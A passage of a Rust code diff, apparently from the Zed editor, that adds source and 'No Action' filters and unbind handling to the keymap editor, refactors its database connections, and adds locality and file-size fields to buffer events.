)];
}
- db::static_connection!(IMAGE_VIEWER, ImageViewerDb, [WorkspaceDb]);
+ db::static_connection!(ImageViewerDb, [WorkspaceDb]);
impl ImageViewerDb {
query! {
@@ -9,7 +9,7 @@ use std::{
path::{Path, PathBuf},
sync::Arc,
};
-use workspace::{AppState, OpenVisible, Workspace};
+use workspace::{AppState, OpenResult, OpenVisible, Workspace};
actions!(
journal,
@@ -107,7 +107,10 @@ pub fn new_journal_entry(workspace: &Workspace, window: &mut Window, cx: &mut Ap
.spawn(cx, async move |cx| {
let (journal_dir, entry_path) = create_entry.await?;
let opened = if open_new_workspace {
- let (new_workspace, _) = cx
+ let OpenResult {
+ window: new_workspace,
+ ..
+ } = cx
.update(|_window, cx| {
workspace::open_paths(
&[journal_dir],
@@ -30,8 +30,8 @@ use settings::{
BaseKeymap, KeybindSource, KeymapFile, Settings as _, SettingsAssets, infer_json_indent_size,
};
use ui::{
- ActiveTheme as _, App, Banner, BorrowAppContext, ContextMenu, IconButtonShape, Indicator,
- Modal, ModalFooter, ModalHeader, ParentElement as _, PopoverMenu, Render, Section,
+ ActiveTheme as _, App, Banner, BorrowAppContext, ContextMenu, IconButtonShape, IconPosition,
+ Indicator, Modal, ModalFooter, ModalHeader, ParentElement as _, PopoverMenu, Render, Section,
SharedString, Styled as _, Table, TableColumnWidths, TableInteractionState,
TableResizeBehavior, Tooltip, Window, prelude::*,
};
@@ -39,7 +39,7 @@ use ui_input::InputField;
use util::ResultExt;
use workspace::{
Item, ModalView, SerializableItem, Workspace, notifications::NotifyTaskExt as _,
- register_serializable_item,
+ register_serializable_item, with_active_or_new_workspace,
};
pub use ui_components::*;
@@ -47,7 +47,7 @@ use zed_actions::{ChangeKeybinding, OpenKeymap};
use crate::{
action_completion_provider::ActionCompletionProvider,
- persistence::KEYBINDING_EDITORS,
+ persistence::KeybindingEditorDb,
ui_components::keystroke_input::{
ClearKeystrokes, KeystrokeInput, StartRecording, StopRecording,
},
@@ -73,6 +73,8 @@ actions!(
CopyContext,
/// Toggles Conflict Filtering
ToggleConflictFilter,
+ /// Toggles whether NoAction bindings are shown
+ ToggleNoActionBindings,
/// Toggle Keystroke search
ToggleKeystrokeSearch,
/// Toggles exact matching for keystroke search
@@ -126,14 +128,16 @@ pub fn init(cx: &mut App) {
}
}
+ cx.on_action(|_: &OpenKeymap, cx| {
+ with_active_or_new_workspace(cx, |workspace, window, cx| {
+ open_keymap_editor(None, workspace, window, cx);
+ });
+ });
+
cx.observe_new(|workspace: &mut Workspace, _window, _cx| {
- workspace
- .register_action(|workspace, _: &OpenKeymap, window, cx| {
- open_keymap_editor(None, workspace, window, cx);
- })
- .register_action(|workspace, action: &ChangeKeybinding, window, cx| {
- open_keymap_editor(Some(action.action.clone()), workspace, window, cx);
- });
+ workspace.register_action(|workspace, action: &ChangeKeybinding, window, cx| {
+ open_keymap_editor(Some(action.action.clone()), workspace, window, cx);
+ });
})
.detach();
@@ -183,7 +187,7 @@ impl KeymapEventChannel {
}
}
-#[derive(Default, PartialEq)]
+#[derive(Default, PartialEq, Copy, Clone)]
enum SearchMode {
#[default]
Normal,
@@ -224,6 +228,25 @@ impl FilterState {
}
}
+#[derive(Default, PartialEq, Eq, Copy, Clone)]
+struct SourceFilters {
+ user: bool,
+ zed_defaults: bool,
+ vim_defaults: bool,
+}
+
+impl SourceFilters {
+ fn allows(&self, source: Option<KeybindSource>) -> bool {
+ match source {
+ Some(KeybindSource::User) => self.user,
+ Some(KeybindSource::Vim) => self.vim_defaults,
+ Some(KeybindSource::Base | KeybindSource::Default | KeybindSource::Unknown) | None => {
+ self.zed_defaults
+ }
+ }
+ }
+}
+
#[derive(Debug, Default, PartialEq, Eq, Clone, Hash)]
struct ActionMapping {
keystrokes: Rc<[KeybindingKeystroke]>,
@@ -412,6 +435,8 @@ struct KeymapEditor {
keybindings: Vec<ProcessedBinding>,
keybinding_conflict_state: ConflictState,
filter_state: FilterState,
+ source_filters: SourceFilters,
+ show_no_action_bindings: bool,
search_mode: SearchMode,
search_query_debounce: Option<Task<()>>,
// corresponds 1 to 1 with keybindings
@@ -477,6 +502,40 @@ fn keystrokes_match_exactly(
})
}
+fn disabled_binding_matches_context(
+ disabled_binding: &gpui::KeyBinding,
+ binding: &gpui::KeyBinding,
+) -> bool {
+ match (
+ disabled_binding.predicate().as_deref(),
+ binding.predicate().as_deref(),
+ ) {
+ (None, _) => true,
+ (Some(_), None) => false,
+ (Some(disabled_predicate), Some(predicate)) => disabled_predicate.is_superset(predicate),
+ }
+}
+
+fn binding_is_unbound_by_unbind(
+ binding: &gpui::KeyBinding,
+ binding_index: usize,
+ all_bindings: &[&gpui::KeyBinding],
+) -> bool {
+ all_bindings[binding_index + 1..]
+ .iter()
+ .rev()
+ .any(|disabled_binding| {
+ gpui::is_unbind(disabled_binding.action())
+ && keystrokes_match_exactly(disabled_binding.keystrokes(), binding.keystrokes())
+ && disabled_binding
+ .action()
+ .as_any()
+ .downcast_ref::<gpui::Unbind>()
+ .is_some_and(|unbind| unbind.0.as_ref() == binding.action().name())
+ && disabled_binding_matches_context(disabled_binding, binding)
+ })
+}
+
impl KeymapEditor {
fn new(workspace: WeakEntity<Workspace>, window: &mut Window, cx: &mut Context<Self>) -> Self {
let _keymap_subscription =
@@ -539,6 +598,12 @@ impl KeymapEditor {
keybindings: vec![],
keybinding_conflict_state: ConflictState::default(),
filter_state: FilterState::default(),
+ source_filters: SourceFilters {
+ user: true,
+ zed_defaults: true,
+ vim_defaults: true,
+ },
+ show_no_action_bindings: true,
search_mode: SearchMode::default(),
string_match_candidates: Arc::new(vec![]),
matches: vec![],
@@ -637,6 +702,11 @@ impl KeymapEditor {
)
.await;
this.update(cx, |this, cx| {
+ matches.retain(|candidate| {
+ this.source_filters
+ .allows(this.keybindings[candidate.candidate_id].keybind_source())
+ });
+
match this.filter_state {
FilterState::Conflicts => {
matches.retain(|candidate| {
@@ -695,6 +765,10 @@ impl KeymapEditor {
SearchMode::Normal => {}
}
+ if !this.show_no_action_bindings {
+ matches.retain(|item| !this.keybindings[item.candidate_id].is_no_action());
+ }
+
if action_query.is_empty() {
matches.sort_by(|item1, item2| {
let binding1 = &this.keybindings[item1.candidate_id];
@@ -729,7 +803,7 @@ impl KeymapEditor {
) {
let key_bindings_ptr = cx.key_bindings();
let lock = key_bindings_ptr.borrow();
- let key_bindings = lock.bindings();
+ let key_bindings = lock.bindings().collect::<Vec<_>>();
let mut unmapped_action_names = HashSet::from_iter(cx.all_action_names().iter().copied());
let action_documentation = cx.action_documentation();
let mut generator = KeymapFile::action_schema_generator();
@@ -742,13 +816,20 @@ impl KeymapEditor {
let mut processed_bindings = Vec::new();
let mut string_match_candidates = Vec::new();
- for key_binding in key_bindings {
+ for (binding_index, &key_binding) in key_bindings.iter().enumerate() {
+ if gpui::is_unbind(key_binding.action()) {
+ continue;
+ }
+
let source = key_binding
.meta()
.map(KeybindSource::from_meta)
.unwrap_or(KeybindSource::Unknown);
let keystroke_text = ui::text_for_keybinding_keystrokes(key_binding.keystrokes(), cx);
+ let is_no_action = gpui::is_no_action(key_binding.action());
+ let is_unbound_by_unbind =
+ binding_is_unbound_by_unbind(key_binding, binding_index, &key_bindings);
let binding = KeyBinding::new(key_binding, source);
let context = key_binding
@@ -783,6 +864,8 @@ impl KeymapEditor {
binding,
context,
source,
+ is_no_action,
+ is_unbound_by_unbind,
action_information,
));
string_match_candidates.push(string_match_candidate);
@@ -976,20 +1059,23 @@ impl KeymapEditor {
.and_then(KeybindContextString::local)
.is_none();
- let selected_binding_is_unbound = selected_binding.is_unbound();
+ let selected_binding_is_unmapped = selected_binding.is_unbound();
+ let selected_binding_is_suppressed = selected_binding.is_unbound_by_unbind();
+ let selected_binding_is_non_interactable =
+ selected_binding_is_unmapped || selected_binding_is_suppressed;
let context_menu = ContextMenu::build(window, cx, |menu, _window, _cx| {
menu.context(self.focus_handle.clone())
- .when(selected_binding_is_unbound, |this| {
+ .when(selected_binding_is_unmapped, |this| {
this.action("Create", Box::new(CreateBinding))
})
.action_disabled_when(
- selected_binding_is_unbound,
+ selected_binding_is_non_interactable,
"Edit",
Box::new(EditBinding),
)
.action_disabled_when(
- selected_binding_is_unbound,
+ selected_binding_is_non_interactable,
"Delete",
Box::new(DeleteBinding),
)
@@ -1037,9 +1123,15 @@ impl KeymapEditor {
&self,
index: usize,
conflict: Option<ConflictOrigin>,
+ is_unbound_by_unbind: bool,
cx: &mut Context<Self>,
) -> IconButton {
- if self.filter_state != FilterState::Conflicts
+ if is_unbound_by_unbind {
+ base_button_style(index, IconName::Warning)
+ .icon_color(Color::Warning)
+ .disabled(true)
+ .tooltip(Tooltip::text("This action is unbound"))
+ } else if self.filter_state != FilterState::Conflicts
&& let Some(conflict) = conflict
{
if conflict.is_user_keybind_conflict() {
@@ -1199,6 +1291,9 @@ impl KeymapEditor {
let Some((keybind, keybind_index)) = self.selected_keybind_and_index() else {
return;
};
+ if !create && keybind.is_unbound_by_unbind() {
+ return;
+ }
let keybind = keybind.clone();
let keymap_editor = cx.entity();
@@ -1305,6 +1400,9 @@ impl KeymapEditor {
let Some(to_remove) = self.selected_binding().cloned() else {
return;
};
+ if to_remove.is_unbound_by_unbind() {
+ return;
+ }
let std::result::Result::Ok(fs) = self
.workspace
@@ -1367,6 +1465,31 @@ impl KeymapEditor {
self.set_filter_state(self.filter_state.invert(), cx);
}
+ fn toggle_no_action_bindings(
+ &mut self,
+ _: &ToggleNoActionBindings,
+ _: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.show_no_action_bindings = !self.show_no_action_bindings;
+ self.on_query_changed(cx);
+ }
+
+ fn toggle_user_bindings_filter(&mut self, cx: &mut Context<Self>) {
+ self.source_filters.user = !self.source_filters.user;
+ self.on_query_changed(cx);
+ }
+
+ fn toggle_zed_defaults_filter(&mut self, cx: &mut Context<Self>) {
+ self.source_filters.zed_defaults = !self.source_filters.zed_defaults;
+ self.on_query_changed(cx);
+ }
+
+ fn toggle_vim_defaults_filter(&mut self, cx: &mut Context<Self>) {
+ self.source_filters.vim_defaults = !self.source_filters.vim_defaults;
+ self.on_query_changed(cx);
+ }
+
fn set_filter_state(&mut self, filter_state: FilterState, cx: &mut Context<Self>) {
if self.filter_state != filter_state {
self.filter_state = filter_state;
@@ -1442,6 +1565,127 @@ impl KeymapEditor {
.filter(|kb| kb.keystrokes().is_some())
.any(|kb| kb.action().name == action_name)
}
+
+ fn render_filter_dropdown(
+ &self,
+ focus_handle: &FocusHandle,
+ cx: &mut Context<KeymapEditor>,
+ ) -> impl IntoElement {
+ let focus_handle = focus_handle.clone();
+ let keymap_editor = cx.entity();
+ return PopoverMenu::new("keymap-editor-filter-menu")
+ .menu(move |window, cx| {
+ Some(ContextMenu::build_persistent(window, cx, {
+ let focus_handle = focus_handle.clone();
+ let keymap_editor = keymap_editor.clone();
+ move |mut menu, _window, cx| {
+ let (filter_state, source_filters, show_no_action_bindings) = keymap_editor
+ .read_with(cx, |editor, _| {
+ (
+ editor.filter_state,
+ editor.source_filters,
+ editor.show_no_action_bindings,
+ )
+ });
+
+ menu = menu
+ .context(focus_handle.clone())
+ .header("Filters")
+ .map(add_filter(
+ "Conflicts",
+ matches!(filter_state, FilterState::Conflicts),
+ Some(ToggleConflictFilter.boxed_clone()),
+ &focus_handle,
+ &keymap_editor,
+ None,
+ ))
+ .map(add_filter(
+ "No Action",
+ show_no_action_bindings,
+ Some(ToggleNoActionBindings.boxed_clone()),
+ &focus_handle,
+ &keymap_editor,
+ None,
+ ))
+ .separator()
+ .header("Categories")
+ .map(add_filter(
+ "User",
+ source_filters.user,
+ None,
+ &focus_handle,
+ &keymap_editor,
+ Some(|editor, cx| {
+ editor.toggle_user_bindings_filter(cx);
+ }),
+ ))
+ .map(add_filter(
+ "Default",
+ source_filters.zed_defaults,
+ None,
+ &focus_handle,
+ &keymap_editor,
+ Some(|editor, cx| {
+ editor.toggle_zed_defaults_filter(cx);
+ }),
+ ))
+ .map(add_filter(
+ "Vim",
+ source_filters.vim_defaults,
+ None,
+ &focus_handle,
+ &keymap_editor,
+ Some(|editor, cx| {
+ editor.toggle_vim_defaults_filter(cx);
+ }),
+ ));
+ menu
+ }
+ }))
+ })
+ .anchor(gpui::Corner::TopRight)
+ .offset(gpui::Point {
+ x: px(0.0),
+ y: px(2.0),
+ })
+ .trigger_with_tooltip(
+ IconButton::new("KeymapEditorFilterMenuButton", IconName::Sliders)
+ .icon_size(IconSize::Small)
+ .when(
+ self.keybinding_conflict_state.any_user_binding_conflicts(),
+ |this| this.indicator(Indicator::dot().color(Color::Warning)),
+ ),
+ Tooltip::text("Filters"),
+ );
+
+ fn add_filter(
+ name: &'static str,
+ toggled: bool,
+ action: Option<Box<dyn Action>>,
+ focus_handle: &FocusHandle,
+ keymap_editor: &Entity<KeymapEditor>,
+ cb: Option<fn(&mut KeymapEditor, &mut Context<KeymapEditor>)>,
+ ) -> impl FnOnce(ContextMenu) -> ContextMenu {
+ let focus_handle = focus_handle.clone();
+ let keymap_editor = keymap_editor.clone();
+ return move |menu: ContextMenu| {
+ menu.toggleable_entry(
+ name,
+ toggled,
+ IconPosition::End,
+ action.as_ref().map(|a| a.boxed_clone()),
+ move |window, cx| {
+ window.focus(&focus_handle, cx);
+ if let Some(action) = &action {
+ window.dispatch_action(action.boxed_clone(), cx);
+ } else if let Some(cb) = cb {
+ keymap_editor.update(cx, cb);
+ }
+ },
+ )
+ };
+ }
+ }
}
struct HumanizedActionNameCache {
@@ -1488,6 +1732,8 @@ struct KeybindInformation {
binding: KeyBinding,
context: KeybindContextString,
source: KeybindSource,
+ is_no_action: bool,
+ is_unbound_by_unbind: bool,
}
impl KeybindInformation {
@@ -1538,6 +1784,8 @@ impl ProcessedBinding {
binding: KeyBinding,
context: KeybindContextString,
source: KeybindSource,
+ is_no_action: bool,
+ is_unbound_by_unbind: bool,
action_information: ActionInformation,
) -> Self {
Self::Mapped(
@@ -1546,6 +1794,8 @@ impl ProcessedBinding {
binding,
context,
source,
+ is_no_action,
+ is_unbound_by_unbind,
},
action_information,
)
@@ -1584,6 +1834,16 @@ impl ProcessedBinding {
self.keybind_information().map(|keybind| &keybind.binding)
}
+ fn is_no_action(&self) -> bool {
+ self.keybind_information()
+ .is_some_and(|keybind| keybind.is_no_action)
+ }
+
+ fn is_unbound_by_unbind(&self) -> bool {
+ self.keybind_information()
+ .is_some_and(|keybind| keybind.is_unbound_by_unbind)
+ }
+
fn keystroke_text(&self) -> Option<&SharedString> {
self.keybind_information()
.map(|binding| &binding.keystroke_text)
@@ -1694,6 +1954,7 @@ impl Render for KeymapEditor {
let row_count = self.matches.len();
let focus_handle = &self.focus_handle;
let theme = cx.theme();
+ let search_mode = self.search_mode;
v_flex()
.id("keymap-editor")
@@ -1711,6 +1972,7 @@ impl Render for KeymapEditor {
.on_action(cx.listener(Self::copy_action_to_clipboard))
.on_action(cx.listener(Self::copy_context_to_clipboard))
.on_action(cx.listener(Self::toggle_conflict_filter))
+ .on_action(cx.listener(Self::toggle_no_action_bindings))
.on_action(cx.listener(Self::toggle_keystroke_search))
.on_action(cx.listener(Self::toggle_exact_keystroke_matching))
.on_action(cx.listener(Self::show_matching_keystrokes))
@@ -1727,6 +1989,7 @@ impl Render for KeymapEditor {
.child(
h_flex()
.gap_2()
+ .items_center()
.child(
h_flex()
.key_context({
@@ -1748,152 +2011,65 @@ impl Render for KeymapEditor {
h_flex()
.gap_1()
.min_w_96()
+ .items_center()
.child(
IconButton::new(
- "KeymapEditorToggleFiltersIcon",
+ "KeymapEditorKeystrokeSearchButton",
IconName::Keyboard,
)
.icon_size(IconSize::Small)
+ .toggle_state(matches!(
+ search_mode,
+ SearchMode::KeyStroke { .. }
+ ))
.tooltip({
let focus_handle = focus_handle.clone();
-
move |_window, cx| {
Tooltip::for_action_in(
- "Search by Keystroke",
+ "Search by Keystrokes",
&ToggleKeystrokeSearch,
- &focus_handle.clone(),
+ &focus_handle,
cx,
)
}
})
- .toggle_state(matches!(
- self.search_mode,
- SearchMode::KeyStroke { .. }
- ))
- .on_click(|_, window, cx| {
+ .on_click(cx.listener(|_, _, window, cx| {
window.dispatch_action(
ToggleKeystrokeSearch.boxed_clone(),
cx,
);
- }),
+ })),
)
.child(
- IconButton::new("KeymapEditorConflictIcon", IconName::Warning)
- .icon_size(IconSize::Small)
- .when(
- self.keybinding_conflict_state
- .any_user_binding_conflicts(),
- |this| {
- this.indicator(
- Indicator::dot().color(Color::Warning),
- )
- },
+ self.render_filter_dropdown(focus_handle, cx)
+ )
+ .child(
+ Button::new("edit-in-json", "Edit in JSON")
+ .style(ButtonStyle::Subtle)
+ .key_binding(
+ ui::KeyBinding::for_action_in(&zed_actions::OpenKeymapFile, &focus_handle, cx)
+ .map(|kb| kb.size(rems_from_px(10.))),
)
- .tooltip({
- let filter_state = self.filter_state;
- let focus_handle = focus_handle.clone();
-
- move |_window, cx| {
- Tooltip::for_action_in(
- match filter_state {
- FilterState::All => "Show Conflicts",
- FilterState::Conflicts => {
- "Hide Conflicts"
- }
- },
- &ToggleConflictFilter,
- &focus_handle.clone(),
- cx,
- )
- }
- })
- .selected_icon_color(Color::Warning)
- .toggle_state(matches!(
- self.filter_state,
- FilterState::Conflicts
- ))
.on_click(|_, window, cx| {
window.dispatch_action(
- ToggleConflictFilter.boxed_clone(),
+ zed_actions::OpenKeymapFile.boxed_clone(),
cx,
);
- }),
+ })
)
.child(
- h_flex()
- .w_full()
- .px_1p5()
- .gap_1()
- .justify_end()
- .child(
- PopoverMenu::new("open-keymap-menu")
- .menu(move |window, cx| {
- Some(ContextMenu::build(window, cx, |menu, _, _| {
- menu.header("View Default...")
- .action(
- "Zed Key Bindings",
- zed_actions::OpenDefaultKeymap
- .boxed_clone(),
- )
- .action(
- "Vim Bindings",
- zed_actions::vim::OpenDefaultKeymap.boxed_clone(),
- )
- }))
- })
- .anchor(gpui::Corner::TopRight)
- .offset(gpui::Point {
- x: px(0.0),
- y: px(2.0),
- })
- .trigger_with_tooltip(
- IconButton::new(
- "OpenKeymapJsonButton",
- IconName::Ellipsis,
- )
- .icon_size(IconSize::Small),
- {
- let focus_handle = focus_handle.clone();
- move |_window, cx| {
- Tooltip::for_action_in(
- "View Default...",
- &zed_actions::OpenKeymapFile,
- &focus_handle,
- cx,
- )
- }
- },
- ),
+ Button::new("create", "Create Keybinding")
+ .style(ButtonStyle::Outlined)
+ .key_binding(
+ ui::KeyBinding::for_action_in(&OpenCreateKeybindingModal, &focus_handle, cx)
+ .map(|kb| kb.size(rems_from_px(10.))),
)
- .child(
- Button::new("edit-in-json", "Edit in JSON")
- .style(ButtonStyle::Subtle)
- .key_binding(
- ui::KeyBinding::for_action_in(&zed_actions::OpenKeymapFile, &focus_handle, cx)
- .map(|kb| kb.size(rems_from_px(10.))),
- )
- .on_click(|_, window, cx| {
- window.dispatch_action(
- zed_actions::OpenKeymapFile.boxed_clone(),
- cx,
- );
- })
- )
- .child(
- Button::new("create", "Create Keybinding")
- .style(ButtonStyle::Outlined)
- .key_binding(
- ui::KeyBinding::for_action_in(&OpenCreateKeybindingModal, &focus_handle, cx)
- .map(|kb| kb.size(rems_from_px(10.))),
- )
- .on_click(|_, window, cx| {
- window.dispatch_action(
- OpenCreateKeybindingModal.boxed_clone(),
- cx,
- );
- })
- )
-
+ .on_click(|_, window, cx| {
+ window.dispatch_action(
+ OpenCreateKeybindingModal.boxed_clone(),
+ cx,
+ );
+ })
)
),
)
@@ -1949,11 +2125,18 @@ impl Render for KeymapEditor {
let binding = &this.keybindings[candidate_id];
let action_name = binding.action().name;
let conflict = this.get_conflict(index);
+ let is_unbound_by_unbind = binding.is_unbound_by_unbind();
let is_overridden = conflict.is_some_and(|conflict| {
!conflict.is_user_keybind_conflict()
});
+ let is_dimmed = is_overridden || is_unbound_by_unbind;
- let icon = this.create_row_button(index, conflict, cx);
+ let icon = this.create_row_button(
+ index,
+ conflict,
+ is_unbound_by_unbind,
+ cx,
+ );
let action = div()
.id(("keymap action", index))
@@ -1974,7 +2157,7 @@ impl Render for KeymapEditor {
.when(
!context_menu_deployed
&& this.show_hover_menus
- && !is_overridden,
+ && !is_dimmed,
|this| {
this.tooltip({
let action_name = binding.action().name;
@@ -2027,7 +2210,7 @@ impl Render for KeymapEditor {
.when(
is_local
&& !context_menu_deployed
- && !is_overridden
+ && !is_dimmed
&& this.show_hover_menus,
|this| {
this.tooltip(Tooltip::element({
@@ -2062,6 +2245,10 @@ impl Render for KeymapEditor {
.map_row(cx.processor(
|this, (row_index, row): (usize, Stateful<Div>), _window, cx| {
let conflict = this.get_conflict(row_index);
+ let candidate_id = this.matches.get(row_index).map(|candidate| candidate.candidate_id);
+ let is_unbound_by_unbind = candidate_id
+ .and_then(|candidate_id| this.keybindings.get(candidate_id))
+ .is_some_and(ProcessedBinding::is_unbound_by_unbind);
let is_selected = this.selected_index == Some(row_index);
let row_id = row_group_id(row_index);
@@ -2070,38 +2257,43 @@ impl Render for KeymapEditor {
.id(("keymap-row-wrapper", row_index))
.child(
row.id(row_id.clone())
- .on_any_mouse_down(cx.listener(
- move |this,
- mouse_down_event: &gpui::MouseDownEvent,
- window,
- cx| {
- if mouse_down_event.button == MouseButton::Right {
- this.select_index(
- row_index, None, window, cx,
- );
- this.create_context_menu(
- mouse_down_event.position,
- window,
- cx,
- );
- }
- },
- ))
- .on_click(cx.listener(
- move |this, event: &ClickEvent, window, cx| {
- this.select_index(row_index, None, window, cx);
- if event.click_count() == 2 {
- this.open_edit_keybinding_modal(
- false, window, cx,
- );
- }
- },
- ))
+ .when(!is_unbound_by_unbind, |row| {
+ row.on_any_mouse_down(cx.listener(
+ move |this,
+ mouse_down_event: &gpui::MouseDownEvent,
+ window,
+ cx| {
+ if mouse_down_event.button == MouseButton::Right {
+ this.select_index(
+ row_index, None, window, cx,
+ );
+ this.create_context_menu(
+ mouse_down_event.position,
+ window,
+ cx,
+ );
+ }
+ },
+ ))
+ })
+ .when(!is_unbound_by_unbind, |row| {
+ row.on_click(cx.listener(
+ move |this, event: &ClickEvent, window, cx| {
+ this.select_index(row_index, None, window, cx);
+ if event.click_count() == 2 {
+ this.open_edit_keybinding_modal(
+ false, window, cx,
+ );
+ }
+ },
+ ))
+ })
.group(row_id)
.when(
- conflict.is_some_and(|conflict| {
- !conflict.is_user_keybind_conflict()
- }),
+ is_unbound_by_unbind
+ || conflict.is_some_and(|conflict| {
+ !conflict.is_user_keybind_conflict()
+ }),
|row| {
const OVERRIDDEN_OPACITY: f32 = 0.5;
row.opacity(OVERRIDDEN_OPACITY)
@@ -2109,7 +2301,8 @@ impl Render for KeymapEditor {
)
.when_some(
conflict.filter(|conflict| {
- !this.context_menu_deployed() &&
+ !is_unbound_by_unbind
+ && !this.context_menu_deployed() &&
!conflict.is_user_keybind_conflict()
}),
|row, conflict| {
@@ -2126,8 +2319,12 @@ impl Render for KeymapEditor {
}.map(|source| format!("This keybinding is overridden by the '{}' binding from {}.", binding.action().humanized_name, source))
}).unwrap_or_else(|| "This binding is overridden.".to_string());
- row.tooltip(Tooltip::text(context))},
- ),
+ row.tooltip(Tooltip::text(context))
+ },
+ )
+ .when(is_unbound_by_unbind, |row| {
+ row.tooltip(Tooltip::text("This action is unbound"))
+ }),
)
.border_2()
.when(
@@ -2928,9 +3125,11 @@ impl Render for KeybindingEditorModal {
.child(
Button::new("show_matching", "View")
.label_size(LabelSize::Small)
- .icon(IconName::ArrowUpRight)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(cx.listener(
|this, _, window, cx| {
this.show_matching_bindings(
@@ -3711,13 +3910,8 @@ impl SerializableItem for KeymapEditor {
_window: &mut Window,
cx: &mut App,
) -> gpui::Task<gpui::Result<()>> {
- workspace::delete_unloaded_items(
- alive_items,
- workspace_id,
- "keybinding_editors",
- &KEYBINDING_EDITORS,
- cx,
- )
+ let db = KeybindingEditorDb::global(cx);
+ workspace::delete_unloaded_items(alive_items, workspace_id, "keybinding_editors", &db, cx)
}
fn deserialize(
@@ -3728,11 +3922,9 @@ impl SerializableItem for KeymapEditor {
window: &mut Window,
cx: &mut App,
) -> gpui::Task<gpui::Result<Entity<Self>>> {
+ let db = KeybindingEditorDb::global(cx);
window.spawn(cx, async move |cx| {
- if KEYBINDING_EDITORS
- .get_keybinding_editor(item_id, workspace_id)?
- .is_some()
- {
+ if db.get_keybinding_editor(item_id, workspace_id)?.is_some() {
cx.update(|window, cx| cx.new(|cx| KeymapEditor::new(workspace, window, cx)))
} else {
Err(anyhow!("No keybinding editor to deserialize"))
@@ -3749,11 +3941,10 @@ impl SerializableItem for KeymapEditor {
cx: &mut ui::Context<Self>,
) -> Option<gpui::Task<gpui::Result<()>>> {
let workspace_id = workspace.database_id()?;
- Some(cx.background_spawn(async move {
- KEYBINDING_EDITORS
- .save_keybinding_editor(item_id, workspace_id)
- .await
- }))
+ let db = KeybindingEditorDb::global(cx);
+ Some(cx.background_spawn(
+ async move { db.save_keybinding_editor(item_id, workspace_id).await },
+ ))
}
fn should_serialize(&self, _event: &Self::Event) -> bool {
@@ -3782,7 +3973,7 @@ mod persistence {
)];
}
- db::static_connection!(KEYBINDING_EDITORS, KeybindingEditorDb, [WorkspaceDb]);
+ db::static_connection!(KeybindingEditorDb, [WorkspaceDb]);
impl KeybindingEditorDb {
query! {
@@ -3955,4 +4146,25 @@ mod tests {
assert!(cmp("!(!(!a))", "!a"));
assert!(cmp("!(!(!(!a)))", "a"));
}
+
+ #[test]
+ fn binding_is_unbound_by_unbind_respects_precedence() {
+ let binding = gpui::KeyBinding::new("tab", zed_actions::OpenKeymap, None);
+ let unbind =
+ gpui::KeyBinding::new("tab", gpui::Unbind(binding.action().name().into()), None);
+
+ let unbind_then_binding = vec![&unbind, &binding];
+ assert!(!binding_is_unbound_by_unbind(
+ &binding,
+ 1,
+ &unbind_then_binding,
+ ));
+
+ let binding_then_unbind = vec![&binding, &unbind];
+ assert!(binding_is_unbound_by_unbind(
+ &binding,
+ 0,
+ &binding_then_unbind,
+ ));
+ }
}
@@ -359,7 +359,7 @@ pub enum BufferEvent {
is_local: bool,
},
/// The buffer was edited.
- Edited,
+ Edited { is_local: bool },
/// The buffer's `dirty` bit changed.
DirtyChanged,
/// The buffer was saved.
@@ -435,7 +435,7 @@ pub enum DiskState {
/// File created in Zed that has not been saved.
New,
/// File present on the filesystem.
- Present { mtime: MTime },
+ Present { mtime: MTime, size: u64 },
/// Deleted file that was previously present.
Deleted,
/// An old version of a file that was previously present
@@ -448,7 +448,17 @@ impl DiskState {
pub fn mtime(self) -> Option<MTime> {
match self {
DiskState::New => None,
- DiskState::Present { mtime } => Some(mtime),
+ DiskState::Present { mtime, .. } => Some(mtime),
+ DiskState::Deleted => None,
+ DiskState::Historic { .. } => None,
+ }
+ }
+
+ /// Returns the file's size on disk in bytes.
+ pub fn size(self) -> Option<u64> {
+ match self {
+ DiskState::New => None,
+ DiskState::Present { size, .. } => Some(size),
DiskState::Deleted => None,
DiskState::Historic { .. } => None,
}
@@ -2377,7 +2387,7 @@ impl Buffer {
};
match file.disk_state() {
DiskState::New => false,
- DiskState::Present { mtime } => match self.saved_mtime {
+ DiskState::Present { mtime, .. } => match self.saved_mtime {
Some(saved_mtime) => {
mtime.bad_is_greater_than(saved_mtime) && self.has_unsaved_edits()
}
@@ -2457,7 +2467,7 @@ impl Buffer {
false
};
if let Some((transaction_id, start_version)) = self.text.end_transaction_at(now) {
- self.did_edit(&start_version, was_dirty, cx);
+ self.did_edit(&start_version, was_dirty, true, cx);
Some(transaction_id)
} else {
None
@@ -2844,7 +2854,13 @@ impl Buffer {
Some(edit_id)
}
- fn did_edit(&mut self, old_version: &clock::Global, was_dirty: bool, cx: &mut Context<Self>) {
+ fn did_edit(
+ &mut self,
+ old_version: &clock::Global,
+ was_dirty: bool,
+ is_local: bool,
+ cx: &mut Context<Self>,
+ ) {
self.was_changed();
if self.edits_since::<usize>(old_version).next().is_none() {
@@ -2852,10 +2868,20 @@ impl Buffer {
}
self.reparse(cx, true);
- cx.emit(BufferEvent::Edited);
- if was_dirty != self.is_dirty() {
+ cx.emit(BufferEvent::Edited { is_local });
+ let is_dirty = self.is_dirty();
+ if was_dirty != is_dirty {
cx.emit(BufferEvent::DirtyChanged);
}
+ if was_dirty && !is_dirty {
+ if let Some(file) = self.file.as_ref() {
+ if matches!(file.disk_state(), DiskState::Present { .. })
+ && file.disk_state().mtime() != self.saved_mtime
+ {
+ cx.emit(BufferEvent::ReloadNeeded);
+ }
+ }
+ }
cx.notify();
}
@@ -2964,7 +2990,7 @@ impl Buffer {
self.text.apply_ops(buffer_ops);
self.deferred_ops.insert(deferred_ops);
self.flush_deferred_ops(cx);
- self.did_edit(&old_version, was_dirty, cx);
+ self.did_edit(&old_version, was_dirty, false, cx);
// Notify independently of whether the buffer was edited as the operations could include a
// selection update.
cx.notify();
@@ -3119,7 +3145,7 @@ impl Buffer {
if let Some((transaction_id, operation)) = self.text.undo() {
self.send_operation(Operation::Buffer(operation), true, cx);
- self.did_edit(&old_version, was_dirty, cx);
+ self.did_edit(&old_version, was_dirty, true, cx);
self.restore_encoding_for_transaction(transaction_id, was_dirty);
Some(transaction_id)
} else {
@@ -3137,7 +3163,7 @@ impl Buffer {
let old_version = self.version.clone();
if let Some(operation) = self.text.undo_transaction(transaction_id) {
self.send_operation(Operation::Buffer(operation), true, cx);
- self.did_edit(&old_version, was_dirty, cx);
+ self.did_edit(&old_version, was_dirty, true, cx);
true
} else {
false
